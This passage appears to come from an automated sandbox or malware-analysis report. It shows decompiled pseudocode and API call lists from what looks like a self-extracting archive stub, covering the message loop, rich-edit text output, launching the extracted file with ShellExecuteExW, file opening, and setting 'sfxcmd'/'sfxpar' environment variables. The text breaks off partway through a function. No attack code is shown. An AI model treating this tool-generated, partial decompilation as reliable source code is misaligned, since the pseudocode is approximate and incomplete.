          • Opcode ID: ece128f5bf2f5aba108d7aaeab7cb32fbf0553ae2eb25db474b17079e346f3ad
          • Instruction ID: fb200c0e3def1bbb2ae41c34cd513708c36d1fad63506209d5f9875cd1d95ece
          • Opcode Fuzzy Hash: ece128f5bf2f5aba108d7aaeab7cb32fbf0553ae2eb25db474b17079e346f3ad
          • Instruction Fuzzy Hash: C2E17176910219AAEF25EFA0DD85EEE737CEF14350F1041A6F509E3092EB709B948F60
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E0020C190(intOrPtr _a4, long _a8) {
          				char _v67;
          				intOrPtr _v72;
          				signed int _v84;
          				int _v88;
          				void* _v92;
          				intOrPtr _t40;
          				intOrPtr _t43;
          				struct HWND__* _t45;
          				char _t48;
          
          				E0020A388(); // executed
          				_t45 = GetDlgItem( *0x2375c8, 0x68);
          				_t48 =  *0x2375d6; // 0x1
          				if(_t48 == 0) {
          					_t43 =  *0x2375e8; // 0x0
          					E00208569(_t43);
          					ShowWindow(_t45, 5); // executed
          					SendMessageW(_t45, 0xb1, 0, 0xffffffff);
          					SendMessageW(_t45, 0xc2, 0, 0x2222e4);
          					 *0x2375d6 = 1;
          				}
          				SendMessageW(_t45, 0xb1, 0x5f5e100, 0x5f5e100);
          				_v92 = 0x5c;
          				SendMessageW(_t45, 0x43a, 0,  &_v92);
          				_v67 = 0;
          				_t40 = _a4;
          				_v88 = 1;
          				if(_t40 != 0) {
          					_v72 = 0xa0;
          					_v88 = 0x40000001;
          					_v84 = _v84 & 0xbfffffff | 1;
          				}
          				SendMessageW(_t45, 0x444, 1,  &_v92);
          				SendMessageW(_t45, 0xc2, 0, _a8);
          				SendMessageW(_t45, 0xb1, 0x5f5e100, 0x5f5e100);
          				if(_t40 != 0) {
          					_v84 = _v84 & 0xfffffffe | 0x40000000;
          					SendMessageW(_t45, 0x444, 1,  &_v92);
          				}
          				return SendMessageW(_t45, 0xc2, 0, L"\r\n");
          			}













          APIs
            • Part of subcall function 0020A388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0020A399
            • Part of subcall function 0020A388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0020A3AA
            • Part of subcall function 0020A388: IsDialogMessageW.USER32(000F004A,?), ref: 0020A3BE
            • Part of subcall function 0020A388: TranslateMessage.USER32(?), ref: 0020A3CC
            • Part of subcall function 0020A388: DispatchMessageW.USER32(?), ref: 0020A3D6
          • GetDlgItem.USER32(00000068,0024DE38), ref: 0020C1A4
          • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00209D8F), ref: 0020C1CF
          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0020C1DE
          • SendMessageW.USER32(00000000,000000C2,00000000,002222E4), ref: 0020C1E8
          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0020C1FE
          • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0020C214
          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0020C254
          • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0020C25E
          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0020C26D
          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0020C290
          • SendMessageW.USER32(00000000,000000C2,00000000,0022304C), ref: 0020C29B
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          Similarity
          • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
          • String ID: \
          • API String ID: 3569833718-2967466578
          • Opcode ID: 0ef0c8a825c94b9add8740dbb399cb2796d16f0c1d2e0277367baebcb7e19b58
          • Instruction ID: f2326b8046325fd4dc97505637d119c872dbb57f9dba92dfaedfa26eb504b0fd
          • Opcode Fuzzy Hash: 0ef0c8a825c94b9add8740dbb399cb2796d16f0c1d2e0277367baebcb7e19b58
          • Instruction Fuzzy Hash: B92134B12493047BE321FF24AC45FAF7F9CEF82754F400609FA90961D1C7A55A098ABB
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 48%
          			E0020C431(struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, int _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, signed short* _a4168, intOrPtr _a4172) {
          				signed short _v0;
          				long _v12;
          				void* __edi;
          				int _t54;
          				signed int _t57;
          				signed short* _t58;
          				long _t68;
          				int _t77;
          				signed int _t80;
          				signed short* _t81;
          				signed short _t82;
          				intOrPtr _t84;
          				long _t86;
          				signed short* _t87;
          				struct HWND__* _t89;
          				signed short* _t91;
          				void* _t93;
          				void* _t95;
          				void* _t99;
          
          				_t54 = 0x1040;
          				E0020D940();
          				_t91 = _a4168;
          				_t77 = 0;
          				if( *_t91 == 0) {
          					L55:
          					return _t54;
          				}
          				_t54 = E00212B33(_t91);
          				if(0x1040 >= 0x7f6) {
          					goto L55;
          				} else {
          					_t86 = 0x3c;
          					E0020E920(_t86,  &_a4, 0, _t86);
          					_t84 = _a4172;
          					_t99 = _t99 + 0xc;
          					_a4.cbSize = _t86;
          					_a8 = 0x1c0;
          					if(_t84 != 0) {
          						_a8 = 0x5c0;
          					}
          					_t80 =  *_t91 & 0x0000ffff;
          					_t87 =  &(_t91[1]);
          					_t95 = 0x22;
          					if(_t80 != _t95) {
          						_t87 = _t91;
          					}
          					_a20 = _t87;
          					_t57 = _t77;
          					if(_t80 == 0) {
          						L13:
          						_t58 = _a24;
          						L14:
          						if(_t58 == 0 ||  *_t58 == _t77) {
          							if(_t84 == 0 &&  *0x23a602 != _t77) {
          								_a24 = 0x23a602;
          							}
          						}
          						_a32 = 1;
          						_t93 = E001FB153(_t87);
          						if(_t93 != 0 && E00201410(_t93, L".inf") == 0) {
          							_a16 = L"Install";
          						}
          						if(E001F9E6B(_a20) != 0) {
          							_push(0x800);
          							_push( &_a64);
          							_push(_a20);
          							E001FAED7();
          							_a8 =  &_a52;
          						}
          						_t54 = ShellExecuteExW( &_a4); // executed
          						if(_t54 != 0) {
          							_t89 = _a4160;
          							if( *0x2385f8 != _t77 || _a4168 != _t77 ||  *0x24de21 != _t77) {
          								if(_t89 != 0) {
          									_push(_t89);
          									if( *0x22df24() != 0) {
          										ShowWindow(_t89, _t77);
          										_t77 = 1;
          									}
          								}
          								 *0x22df20(_a56, 0x7d0);
          								E0020C8F0(_a48);
          								if( *0x24de21 != 0 && _a4160 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
          									_t68 = _v12;
          									if(_t68 >  *0x24de24) {
          										 *0x24de24 = _t68;
          									}
          									 *0x24de22 = 1;
          								}
          							}
          							CloseHandle(_a48);
          							if(_t93 == 0 || E00201410(_t93, L".exe") != 0) {
          								_t54 = _a4160;
          								if( *0x2385f8 != 0 && _t54 == 0 &&  *0x24de21 == _t54) {
          									 *0x24de28 = 0x1b58;
          								}
          							} else {
          								_t54 = _a4160;
          							}
          							if(_t77 != 0 && _t54 != 0) {
          								_t54 = ShowWindow(_t89, 1);
          							}
          						}
          						goto L55;
          					}
          					_t81 = _t91;
          					_v0 = 0x20;
          					do {
          						if( *_t81 == _t95) {
          							while(1) {
          								_t57 = _t57 + 1;
          								if(_t91[_t57] == _t77) {
          									break;
          								}
          								if(_t91[_t57] == _t95) {
          									_t82 = _v0;
          									_t91[_t57] = _t82;
          									L10:
          									if(_t91[_t57] == _t82 ||  *((short*)(_t91 + 2 + _t57 * 2)) == 0x2f) {
          										if(_t91[_t57] == _v0) {
          											_t91[_t57] = 0;
          										}
          										_t58 =  &(_t91[_t57 + 1]);
          										_a24 = _t58;
          										goto L14;
          									} else {
          										goto L12;
          									}
          								}
          							}
          						}
          						_t82 = _v0;
          						goto L10;
          						L12:
          						_t57 = _t57 + 1;
          						_t81 =  &(_t91[_t57]);
          					} while ( *_t81 != _t77);
          					goto L13;
          				}
          			}























          APIs
          • ShellExecuteExW.SHELL32(000001C0), ref: 0020C55F
          • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 0020C5A4
          • GetExitCodeProcess.KERNEL32 ref: 0020C5DC
          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0020C602
          • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 0020C691
            • Part of subcall function 00201410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,001FACFE,?,?,?,001FACAD,?,-00000002,?,00000000,?), ref: 00201426
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          Similarity
          • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
          • String ID: $.exe$.inf
          • API String ID: 3686203788-2452507128
          • Opcode ID: b8d665eb90e158ee6dbd86df769839f82ae62ebfe97c33495c16da550bdd2914
          • Instruction ID: 9a7266b06284b96944c7abd3cec1cccb5bbd193a244df106c7ebfeab8d0ae9b1
          • Opcode Fuzzy Hash: b8d665eb90e158ee6dbd86df769839f82ae62ebfe97c33495c16da550bdd2914
          • Instruction Fuzzy Hash: 7D5158B00283419AC731DF60E904B7B7BE8EF85304F240A1DF4C1A71E2D7B29968CB52
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 71%
          			E002195A5(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
          				signed int _v8;
          				int _v12;
          				void* _v24;
          				signed int _t49;
          				signed int _t54;
          				int _t57;
          				signed int _t59;
          				short* _t61;
          				signed int _t65;
          				short* _t69;
          				int _t77;
          				short* _t80;
          				signed int _t86;
          				signed int _t89;
          				void* _t94;
          				void* _t95;
          				int _t97;
          				short* _t100;
          				int _t102;
          				int _t104;
          				signed int _t105;
          				short* _t106;
          				void* _t109;
          
          				_push(__ecx);
          				_push(__ecx);
          				_t49 =  *0x22d668; // 0x4319796a
          				_v8 = _t49 ^ _t105;
          				_push(__esi);
          				_t102 = _a20;
          				if(_t102 > 0) {
          					_t77 = E0021DBBC(_a16, _t102);
          					_t109 = _t77 - _t102;
          					_t4 = _t77 + 1; // 0x1
          					_t102 = _t4;
          					if(_t109 >= 0) {
          						_t102 = _t77;
          					}
          				}
          				_t97 = _a32;
          				if(_t97 == 0) {
          					_t97 =  *( *_a4 + 8);
          					_a32 = _t97;
          				}
          				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
          				_v12 = _t54;
          				if(_t54 == 0) {
          					L38:
          					return E0020E203(_t54, _v8 ^ _t105);
          				} else {
          					_t94 = _t54 + _t54;
          					_t84 = _t94 + 8;
          					asm("sbb eax, eax");
          					if((_t94 + 0x00000008 & _t54) == 0) {
          						_t80 = 0;
          						__eflags = 0;
          						L14:
          						if(_t80 == 0) {
          							L36:
          							_t104 = 0;
          							L37:
          							E0021980D(_t80);
          							_t54 = _t104;
          							goto L38;
          						}
          						_t57 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t80, _v12);
          						_t120 = _t57;
          						if(_t57 == 0) {
          							goto L36;
          						}
          						_t99 = _v12;
          						_t59 = E00219C64(_t84, _t102, _t120, _a8, _a12, _t80, _v12, 0, 0, 0, 0, 0); // executed
          						_t104 = _t59;
          						if(_t104 == 0) {
          							goto L36;
          						}
          						if((_a12 & 0x00000400) == 0) {
          							_t95 = _t104 + _t104;
          							_t86 = _t95 + 8;
          							__eflags = _t95 - _t86;
          							asm("sbb eax, eax");
          							__eflags = _t86 & _t59;
          							if((_t86 & _t59) == 0) {
          								_t100 = 0;
          								__eflags = 0;
          								L30:
          								__eflags = _t100;
          								if(__eflags == 0) {
          									L35:
          									E0021980D(_t100);
          									goto L36;
          								}
          								_t61 = E00219C64(_t86, _t104, __eflags, _a8, _a12, _t80, _v12, _t100, _t104, 0, 0, 0);
          								__eflags = _t61;
          								if(_t61 == 0) {
          									goto L35;
          								}
          								_push(0);
          								_push(0);
          								__eflags = _a28;
          								if(_a28 != 0) {
          									_push(_a28);
          									_push(_a24);
          								} else {
          									_push(0);
          									_push(0);
          								}
          								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
          								__eflags = _t104;
          								if(_t104 != 0) {
          									E0021980D(_t100);
          									goto L37;
          								} else {
          									goto L35;
          								}
          							}
          							_t89 = _t95 + 8;
          							__eflags = _t95 - _t89;
          							asm("sbb eax, eax");
          							_t65 = _t59 & _t89;
          							_t86 = _t95 + 8;
          							__eflags = _t65 - 0x400;
          							if(_t65 > 0x400) {
          								__eflags = _t95 - _t86;
          								asm("sbb eax, eax");
          								_t100 = E00217A8A(_t86, _t65 & _t86);
          								_pop(_t86);
          								__eflags = _t100;
          								if(_t100 == 0) {
          									goto L35;
          								}
          								 *_t100 = 0xdddd;
          								L28:
          								_t100 =  &(_t100[4]);
          								goto L30;
          							}
          							__eflags = _t95 - _t86;
          							asm("sbb eax, eax");
          							E00220EE0();
          							_t100 = _t106;
          							__eflags = _t100;
          							if(_t100 == 0) {
          								goto L35;
          							}
          							 *_t100 = 0xcccc;
          							goto L28;
          						}
          						_t69 = _a28;
          						if(_t69 == 0) {
          							goto L37;
          						}
          						_t124 = _t104 - _t69;
          						if(_t104 > _t69) {
          							goto L36;
          						}
          						_t104 = E00219C64(0, _t104, _t124, _a8, _a12, _t80, _t99, _a24, _t69, 0, 0, 0);
          						if(_t104 != 0) {
          							goto L37;
          						}
          						goto L36;
          					}
          					asm("sbb eax, eax");
          					_t71 = _t54 & _t94 + 0x00000008;
          					_t84 = _t94 + 8;
          					if((_t54 & _t94 + 0x00000008) > 0x400) {
          						__eflags = _t94 - _t84;
          						asm("sbb eax, eax");
          						_t80 = E00217A8A(_t84, _t71 & _t84);
          						_pop(_t84);
          						__eflags = _t80;
          						if(__eflags == 0) {
          							goto L36;
          						}
          						 *_t80 = 0xdddd;
          						L12:
          						_t80 =  &(_t80[4]);
          						goto L14;
          					}
          					asm("sbb eax, eax");
          					E00220EE0();
          					_t80 = _t106;
          					if(_t80 == 0) {
          						goto L36;
          					}
          					 *_t80 = 0xcccc;
          					goto L12;
          				}
          			}



























          APIs
          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0021451B,0021451B,?,?,?,002197F6,00000001,00000001,31E85006), ref: 002195FF
          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,002197F6,00000001,00000001,31E85006,?,?,?), ref: 00219685
          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,31E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0021977F
          • __freea.LIBCMT ref: 0021978C
            • Part of subcall function 00217A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00212FA6,?,0000015D,?,?,?,?,00214482,000000FF,00000000,?,?), ref: 00217ABC
          • __freea.LIBCMT ref: 00219795
          • __freea.LIBCMT ref: 002197BA
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          Similarity
          • API ID: ByteCharMultiWide__freea$AllocateHeap
          • String ID:
          • API String ID: 1414292761-0
          • Opcode ID: 0d95f81dce344a8df32a72d4f9f677f3debd63f7560167a9bde3189d9db2f68c
          • Instruction ID: 18ded262519fa12feb4243d83be2487ef7d82461fa3fe236545c3ca47975631d
          • Opcode Fuzzy Hash: 0d95f81dce344a8df32a72d4f9f677f3debd63f7560167a9bde3189d9db2f68c
          • Instruction Fuzzy Hash: CC51C6B2630216AEDB259F64CC91EFAB7E9DF54750F154628FC05D6180DB34DCE1CAA0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E00209A32(long _a4) {
          				short _v164;
          				long _t5;
          				long _t6;
          				WCHAR* _t9;
          				long _t11;
          
          				_t11 = _a4;
          				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
          				if(_t5 != 0) {
          					_t9 = L"EDIT";
          					_t5 = E00201410( &_v164, _t9);
          					if(_t5 != 0) {
          						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
          						_t11 = _t5;
          					}
          				}
          				if(_t11 != 0) {
          					_t6 = SHAutoComplete(_t11, 0x10); // executed
          					return _t6;
          				}
          				return _t5;
          			}









          APIs
          • GetClassNameW.USER32(?,?,00000050), ref: 00209A49
          • SHAutoComplete.SHLWAPI(?,00000010), ref: 00209A80
            • Part of subcall function 00201410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,001FACFE,?,?,?,001FACAD,?,-00000002,?,00000000,?), ref: 00201426
          • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00209A70
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          Similarity
          • API ID: AutoClassCompareCompleteFindNameStringWindow
          • String ID: EDIT$pltv
          • API String ID: 4243998846-1976670045
          • Opcode ID: db9568fadae7d02784ee17273c2671d9730c5dc412e4d2611a82283d05582566
          • Instruction ID: ee6c3d48d35fed365bea6b099a20391549e9611adc41a701c632896b276c4b38
          • Opcode Fuzzy Hash: db9568fadae7d02784ee17273c2671d9730c5dc412e4d2611a82283d05582566
          • Instruction Fuzzy Hash: 18F0E932B1032837D7309AA46C09FEB776C9B46B00F040155FD01A30C1D764995286F9
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 94%
          			E001F9768(void* __ecx, void* __esi, struct _FILETIME _a4, signed int _a8, short _a12, WCHAR* _a4184, unsigned int _a4188) {
          				long _v0;
          				void* _t48;
          				long _t59;
          				unsigned int _t61;
          				long _t64;
          				signed int _t65;
          				char _t68;
          				void* _t72;
          				void* _t74;
          				long _t78;
          				void* _t81;
          
          				_t74 = __esi;
          				E0020D940();
          				_t61 = _a4188;
          				_t72 = __ecx;
          				 *(__ecx + 0x1020) =  *(__ecx + 0x1020) & 0x00000000;
          				if( *((char*)(__ecx + 0x1d)) != 0 || (_t61 & 0x00000004) != 0) {
          					_t68 = 1;
          				} else {
          					_t68 = 0;
          				}
          				_push(_t74);
          				asm("sbb esi, esi");
          				_t78 = ( ~(_t61 >> 0x00000001 & 1) & 0xc0000000) + 0x80000000;
          				if((_t61 & 0x00000001) != 0) {
          					_t78 = _t78 | 0x40000000;
          				}
          				_t64 =  !(_t61 >> 3) & 0x00000001;
          				if(_t68 != 0) {
          					_t64 = _t64 | 0x00000002;
          				}
          				_v0 = (0 |  *((intOrPtr*)(_t72 + 0x15)) != 0x00000000) - 0x00000001 & 0x08000000;
          				E001F6EF9( &_a12);
          				if( *((char*)(_t72 + 0x1c)) != 0) {
          					_t78 = _t78 | 0x00000100;
          				}
          				_t48 = CreateFileW(_a4184, _t78, _t64, 0, 3, _v0, 0); // executed
          				_t81 = _t48;
          				if(_t81 != 0xffffffff) {
          					L17:
          					if( *((char*)(_t72 + 0x1c)) != 0 && _t81 != 0xffffffff) {
          						_a4.dwLowDateTime = _a4.dwLowDateTime | 0xffffffff;
          						_a8 = _a8 | 0xffffffff;
          						SetFileTime(_t81, 0,  &_a4, 0);
          					}
          					 *((char*)(_t72 + 0x12)) = 0;
          					_t65 = _t64 & 0xffffff00 | _t81 != 0xffffffff;
          					 *((intOrPtr*)(_t72 + 0xc)) = 0;
          					 *((char*)(_t72 + 0x10)) = 0;
          					if(_t81 != 0xffffffff) {
          						 *(_t72 + 4) = _t81;
          						E001FFAB1(_t72 + 0x1e, _a4184, 0x800);
          					}
          					return _t65;
          				} else {
          					_a4.dwLowDateTime = GetLastError();
          					if(E001FB32C(_a4184,  &_a12, 0x800) == 0) {
          						L15:
          						if(_a4.dwLowDateTime == 2) {
          							 *((intOrPtr*)(_t72 + 0x1020)) = 1;
          						}
          						goto L17;
          					}
          					_t81 = CreateFileW( &_a12, _t78, _t64, 0, 3, _v0, 0);
          					_t59 = GetLastError();
          					if(_t59 == 2) {
          						_a4.dwLowDateTime = _t59;
          					}
          					if(_t81 != 0xffffffff) {
          						goto L17;
          					} else {
          						goto L15;
          					}
          				}
          			}















          APIs
          • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,001F76F2,?,00000005,?,00000011), ref: 001F9804
          • GetLastError.KERNEL32(?,?,001F76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001F9811
          • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,00000800,?,?,001F76F2,?,00000005,?), ref: 001F9846
          • GetLastError.KERNEL32(?,?,001F76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001F984E
          • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,001F76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001F9893
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: File$CreateErrorLast$Time
          • String ID:
          • API String ID: 1999340476-0
          • Opcode ID: 04a51c6c6f38f0a5f374fd22cfa980b5a6b306db1489b47a4306ff6cc5f1c961
          • Instruction ID: ccc82682a8d6f8bedb614e8cf68af7cf94061bcf2ab86ea625c32504cb32969b
          • Opcode Fuzzy Hash: 04a51c6c6f38f0a5f374fd22cfa980b5a6b306db1489b47a4306ff6cc5f1c961
          • Instruction Fuzzy Hash: 6841287144474E7BE320AF60DC05BFABBD4FB01364F100719FAA1961D1D3B59999CB91
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E0020A388() {
          				struct tagMSG _v32;
          				int _t7;
          				struct HWND__* _t10;
          				long _t14;
          
          				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
          				if(_t7 != 0) {
          					GetMessageW( &_v32, 0, 0, 0);
          					_t10 =  *0x2375c8; // 0xf004a
          					if(_t10 == 0) {
          						L3:
          						TranslateMessage( &_v32);
          						_t14 = DispatchMessageW( &_v32); // executed
          						return _t14;
          					}
          					_t7 = IsDialogMessageW(_t10,  &_v32); // executed
          					if(_t7 == 0) {
          						goto L3;
          					}
          				}
          				return _t7;
          			}








          APIs
          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0020A399
          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0020A3AA
          • IsDialogMessageW.USER32(000F004A,?), ref: 0020A3BE
          • TranslateMessage.USER32(?), ref: 0020A3CC
          • DispatchMessageW.USER32(?), ref: 0020A3D6
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: Message$DialogDispatchPeekTranslate
          • String ID:
          • API String ID: 1266772231-0
          • Opcode ID: 5593db87d7a29e8b8cdab5eb9396440d99e0e2baab3042123e80d22981055759
          • Instruction ID: c7f7e4daba8ac21ea8d8a565e55ed4e4bd6f4daf8669084cbfc82fcea392a332
          • Opcode Fuzzy Hash: 5593db87d7a29e8b8cdab5eb9396440d99e0e2baab3042123e80d22981055759
          • Instruction Fuzzy Hash: FBF0177191132ABBCB30AFE2BD4CEEB7F6CEE052617405055F80AD2440E768D506CBE0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 25%
          			E00209AA0(intOrPtr* __ecx) {
          				char _v8;
          				intOrPtr _v12;
          				char _v16;
          				intOrPtr _v20;
          				intOrPtr _v24;
          				intOrPtr _v28;
          				char _v32;
          				intOrPtr _t10;
          
          				_t10 = E001FFCFD(L"riched20.dll"); // executed
          				 *__ecx = _t10;
          				 *0x22dffc(0); // executed
          				_v16 = 8;
          				_v12 = 0x7ff;
          				 *0x22deb4( &_v16);
          				_v32 = 1;
          				_v28 = 0;
          				_v24 = 0;
          				_v20 = 0;
          				L0020D820(); // executed
          				 *0x22df08(0x2375c0,  &_v8,  &_v32, 0); // executed
          				return __ecx;
          			}












          APIs
            • Part of subcall function 001FFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001FFD18
            • Part of subcall function 001FFCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001FE7F6,Crypt32.dll,?,001FE878,?,001FE85C,?,?,?,?), ref: 001FFD3A
          • OleInitialize.OLE32(00000000), ref: 00209AB9
          • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00209AF0
          • SHGetMalloc.SHELL32(002375C0), ref: 00209AFA
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
          • String ID: riched20.dll
          • API String ID: 3498096277-3360196438
          • Opcode ID: 5ed3afc77131757db3068607f590e1fe6ea3b0f80d37fe2de511142c5f47a7ed
          • Instruction ID: 0b473b9f5e6d29171ed4c0b5c92c3593aa707ab1c85909edfd4159e671ee7c8c
          • Opcode Fuzzy Hash: 5ed3afc77131757db3068607f590e1fe6ea3b0f80d37fe2de511142c5f47a7ed
          • Instruction Fuzzy Hash: 5DF04FB1D0021DABCB20EFD9D849AEEFBFCEF54311F00405AE814A2240DBB416068BA1
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 66%
          			E0020C891(void* __eflags, WCHAR* _a4) {
          				char _v8196;
          				int _t7;
          				WCHAR* _t12;
          				void* _t14;
          
          				_t14 = __eflags;
          				E0020D940();
          				SetEnvironmentVariableW(L"sfxcmd", _a4); // executed
          				_t7 = E001FF835(_t14, _a4,  &_v8196, 0x1000);
          				_t12 = _t7;
          				if(_t12 != 0) {
          					_push( *_t12 & 0x0000ffff);
          					while(E001FF94C() != 0) {
          						_t12 =  &(_t12[1]);
          						__eflags = _t12;
          						_push( *_t12 & 0x0000ffff);
          					}
          					_t7 = SetEnvironmentVariableW(L"sfxpar", _t12); // executed
          				}
          				return _t7;
          			}








          APIs
          • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0020C8A7
          • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0020C8E3
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: EnvironmentVariable
          • String ID: sfxcmd$sfxpar
          • API String ID: 1431749950-3493335439
          • Opcode ID: 40e33890648085558634af0171295c6b44ccee0c7b53f2d56b304dc8c9f746f6
          • Instruction ID: c1eaa217a3079e0e46c637a2c0b801a37bc35712f0be372c523830daf6edb303
          • Opcode Fuzzy Hash: 40e33890648085558634af0171295c6b44ccee0c7b53f2d56b304dc8c9f746f6
          • Instruction Fuzzy Hash: FEF0E2B2821229B6C7216FC0AC09EBA776C9F15B51B004166FE4896183DAA19862C7A0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 59%
          			E001F964A(void* __ecx, void* _a4, long _a8) {
          				long _v8;
          				int _t14;
          				signed int _t15;
          				void* _t25;
          
          				_push(__ecx);
          				_t25 = __ecx;
          				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
          					 *(_t25 + 4) = GetStdHandle(0xfffffff6);
          				}
          				_t14 = ReadFile( *(_t25 + 4), _a4, _a8,  &_v8, 0); // executed
          				if(_t14 != 0) {
          					_t15 = _v8;
          				} else {
          					_t16 = E001F9745(_t25);
          					if(_t16 == 0) {
          						L7:
          						if( *((intOrPtr*)(_t25 + 0xc)) != 1) {
          							L10:
